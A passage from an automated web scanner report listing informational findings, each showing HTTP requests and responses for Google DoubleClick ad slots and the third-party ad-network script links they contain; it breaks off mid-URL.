GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676588&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658588945&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658588950&frm=1&adk=2614322350&ga_vid=782650764.1303658589&ga_sid=1303658589&ga_hid=1689971697&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=13 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:23:06 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4568

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keyword%25257D%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3DFree-Recipes.iBario.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHYPa0LIU8Ltc4H5JF9DPdaKm3XWw" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

23.425. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680890&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662890088&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662890093&frm=1&adk=2614322350&ga_vid=1560121148.1303662890&ga_sid=1303662890&ga_hid=1998041155&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=7 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:34:47 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 15189

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.dell.com/business%26adT%3DDell%25E2%2584%25A2%2BWeb%2BServer%26adU%3Dwww.bing.com/Local%26adT%3DAtlanta%2BIrish%2BRestaurants%26adU%3Darenasportsgrille.com%26adT%3DARENA%2BSports%2BBar%2B%2526amp%253B%2BGrill%26adU%3Dcoastlinemicro.com/rackserver%26adT%3DOptimized%2BRack%2BServer%26adU%3DPeru.travel%26adT%3DVisiting%2BAmazonia%253F%26gl%3DUS&amp;usg=AFQjCNGGxcKTGXFu-pkfx8o87iCi6PZ9MA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.426. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658383860&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658383865&frm=1&adk=513358139&ga_vid=27783855.1303658384&ga_sid=1303658384&ga_hid=2094739292&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=8 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:19:41 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1771

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=-oTsvI3N5T_6hOy8jc3lPwAAAMDMzARA-oTsvI3N5T_5hOy8jc3lPw371D7bYuY9SsYda6b2ziWMP7RNAAAAAD8wAAC1AAAAlgIAAAIAAADIpAIA0WMAAAEAAABVU0QAVVNEANgCWgAbC0sAAg8BAgUCAAQAAAAAliuUMQAAAAA.&tt_code=vert-188&udj=uf%28%27a%27%2C+9797%2C+1303658392%29%3Buf%28%27c%27%2C+52368%2C+1303658392%29%3Buf%28%27r%27%2C+173256%2C+1303658392%29%3Bppv%288991%2C+%274460361174748560141%27%2C+1303658392%2C+1303701592%2C+52368%2C+25553%29%3B&cnd=!CxAduAiQmQMQyMkKGAAg0ccBKEsxRkF1FY7N5T9CCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ..&pp=TbQ_jAANSaQK5YDMNydYgG7Im0-Tq_rP9RH-mQ&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBxA4vjD-0TaSTNcyBlgeAsZ25A9fq-NMBr56U7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEJNzI4eDkwX2FzyAEJ2gFIaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl83MjhfOTBfYS5waHA_c2VhcmNoPSU3QiRrZXl3b3JkJTdEmALCA8ACBMgChdLPCqgDAegDvAHoA5QC9QMAAADEgAb746GF_uDvrsAB%26num%3D1%26sig%3DAGiWqtzq6jdVFSiz91eOPCoaaXhjQFcD_w%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

23.427. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681950&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663950392&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303663950406&frm=1&adk=2614322350&ga_vid=1893088384.1303663950&ga_sid=1303663950&ga_hid=925351750&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=17 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:52:27 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14856

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.dell.com/business%26adT%3DDell%25E2%2584%25A2%2BWeb%2BServer%26adU%3Dwww.doubletake.visionsolutions.com%26adT%3DVirtualization%2BWhitepaper%26adU%3DInfocus.com/MSPRevenue%26adT%3DIncrease%2BMSP%2BRevenue%26adU%3Dtripplite.com/CoolingSolution%26adT%3DPortable%2BAC%2BUnit%26adU%3DDealfind.com/Chicago%26adT%3DChicago%2BDaily%2BCoupons%26gl%3DUS&amp;usg=AFQjCNEKwdPhH-YYo-6UL0MX1bskmb4EdQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.428. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680216&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662216231&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662216243&frm=1&adk=2614322350&ga_vid=1201236310.1303662216&ga_sid=1303662216&ga_hid=2010158345&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=14 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:23:33 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2161

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script type="text/javascript" src="http://ad.turn.com/server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25622058&ahcid=787926&bimpd=ZgRAXFQYPQ72pSfK_PTQXwYv4sqzRgrPFWEPN0T11xiEIpxs2hJ8CaiUjHpmY1v-N23Q0O1bkk3X5KD3AvT7rK9niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BAVsGcZaad0LohGRrY_PptpgOqkQGoDTJbJd7uwGGvhIlgHBzIj8H9loLjUdnhyPRbB5cdXFU4eUtt0Sd-buMq4iT9bDskPT3GYIORMjuNHSgU2xBm3QHaMdsIoCKhXuXzRgCD-gHnxGWovO3Pj6yB57QZSR55M9KtvER9_PB-eitC8cnfVoc-ffY0bjr9ypPula_qJLrXcrZr4baiYl_ymbdXBugl_YriUkFVc2JIJzcrbHBKfRsOA81Nd1u8is6AaJQmyFM1l4x-S8oOkTR0VUULXw7tpNDsCXeX5kiU7IMmAKf-fTCPDGWd8sW3YPeje31BMcyDn3elA9zU91mj8tpJsct7VH1G9-d_6KUMHbX91mNtx9s8FQapZIbkQ1tLXj2l4eq3bXsLRG2lgk3vFLdD31mqGRsMBpPXQG-h3S5RRYa-cfSyudFlPXwGJCEdWGFeOJW7Ysm02dNTuGUaDt_T370WDWWY1SqEwEJwbhx8Qd9AYEkrt9Ysl-GVyMgJyFabNKBnxQoIOFlgiYOrJA9y0FUzpqtDC0K6uSmpOa-_o7WETpsTIqibm6vBqblKo408BxR9uazB8jKSDnLvk&acp=TbROhQAEnBkK5TqFIPdMcXGIyEr_KizofF-fzw&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB1Ut5hU60TZm4EoX1lAfxmN2HAsCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAaBvY_1rt6P2yo%26num%3D1%26sig%3DAGiWqtzaFmwsDVNDneUP-J0S8ckVGnH7aw%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

23.429. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676405&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658405693&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658405698&frm=1&adk=2614322350&ga_vid=1614568691.1303658406&ga_sid=1303658406&ga_hid=1709323827&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:20:02 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 2245

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
rWFooeVRDX2hNa3k1OVhRTUx1SHhHTHpnTWxqNjREUWJPdUFtMk1sQmYwWYABksehoQGoAaazB7ABAQ;redirect=http%3A%2F%2Fwww.regonline.com%2F%3Futm_source%3Dquantcast%26utm_medium%3Ddisplay%26utm_campaign%3DQC_201104v1"><img src="http://content.quantserve.com/ads/regonline/Regonline_Q2-11.20110419.160x600.gif" style="border-style: none"/></A><img src="http://exch.quantserve.com/pixel/p-b7FzQys84a9fI.gif?media=ad&p=TbQ_ogAK10MK5XGHGH5mzSTyttotluXXoI9-vw&r=380995555&rand=76158&labels=_qc.imp,_imp.adserver.rtb,_imp.rtbposition=0&rtbip=63.251.90.144&rtbdata2=EAAaD1JlZ29ubGluZV9RMi0xMSDQCyiEGTD-3B46M2h0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocEIHCK_GBxD1AUoHCP66BhDrWFooeVRDX2hNa3k1OVhRTUx1SHhHTHpnTWxqNjREUWJPdUFtMk1sQmYwWYABksehoQGoAaazB7ABAQ" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/></body>
...[SNIP]...

23.430. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303684213&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F24%2Fdork%2Freflected-xss-attack-dynamically-evaluated-expression-style-attribute-javascript-controldcasecom.html&dt=1303666213539&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303666213768&frm=0&adk=1607234649&ga_vid=730924541.1303666214&ga_sid=1303666214&ga_hid=932752646&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=964&bih=907&fu=0&ifi=1&dtd=364&xpc=vdfiYxvdfb&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 17:30:11 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 13384

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/24/dork/reflected-xss-attack-dynamically-evaluated-expression-style-attribute-javascript-controldcasecom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.dell.com/business%26adT%3DServer%2BVirtualization%26adU%3DPort80Software.com/ServerDefenderVP%26adT%3DWindows%2BServer%2BSecurity%26adU%3Dwww.obs-innovation.com%26adT%3DFree%2BDocument%2BWhite%2BPaper%26gl%3DUS&amp;usg=AFQjCNG1pLPCZO4q8RiXEOWNJ8cotTk6EQ" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.431. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676469&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658469201&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303658469206&frm=1&adk=2614322350&ga_vid=1759932487.1303658469&ga_sid=1303658469&ga_hid=1147935042&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=22 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:21:06 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1923

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=mpmZmZmZuT-amZmZmZm5PwAAAEAzMwdAmpmZmZmZuT-amZmZmZm5P_mQR_AAUHosSsYda6b2ziXiP7RNAAAAAD8wAAC1AAAAbAEAAAIAAACAbAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sA2wsBAgUCAAQAAAAAFiXDZgAAAAA.&tt_code=vert-188&udj=uf%28%27a%27%2C+8044%2C+1303658466%29%3Buf%28%27c%27%2C+43438%2C+1303658466%29%3Buf%28%27r%27%2C+158848%2C+1303658466%29%3Bppv%288484%2C+%273204962049788973305%27%2C+1303658466%2C+1304263266%2C+43438%2C+25553%29%3Bppv%288484%2C+%273204962049788973305%27%2C+1303658466%2C+1304263266%2C+43438%2C+25553%29%3B&cnd=!vRxSdAiu0wIQgNkJGAAg0ccBKEsxmpmZmZmZuT9CEwgAEAAYACABKP7__________wFCDgikQhCshfYCGBEgAygCQgsIpEIQABgAIAIoAkgDUABYmxZgAGjsAg..&referrer=http://pub.retailer-amazon.net/banner_120_600_b.php&pp=TbQ_4gADisoK5X6QKLMxXVZJNJEgHbYzsId3Pg&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBLYO64j-0TcqVDpD9lQfd4szFAsDG1PcB6LqfjxvwmZTrRAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4sgEXcHViLnJldGFpbGVyLWFtYXpvbi5uZXS6AQoxNjB4NjAwX2FzyAEJ2gFJaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwP3NlYXJjaD0lN0Ika2V5d29yZCU3RJgCZMACBMgCqKikGagDAegDvAHoA5QC9QMAAADEgAaE